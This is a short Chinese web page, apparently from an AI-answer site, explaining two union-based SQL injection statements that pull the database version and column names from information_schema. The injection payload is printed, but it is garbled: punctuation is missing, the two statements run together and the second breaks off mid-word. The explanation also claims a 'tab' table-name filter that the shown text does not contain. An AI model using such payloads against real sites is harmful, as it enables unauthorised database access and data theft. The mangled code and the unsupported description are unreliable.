这两个语句的功能是利用 SQL 注入漏洞获取数据库中表的列名信息。其中,第一个语句获取当前数据库版本和该数据库中所有表的列名信息,第二个语句在第一个语句的基础上加入了一个额外的条件,只获取以 "tab" 开头的表的列名信息。

kobe and 1=1 union select versiongroup_concatcolumn_name from information_schemacolumns where table_schema=database-- -kobe and 1=1 union select versiongroup_concatcolumn_name from information_schem

原文地址: https://www.cveoy.top/t/topic/hvID 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录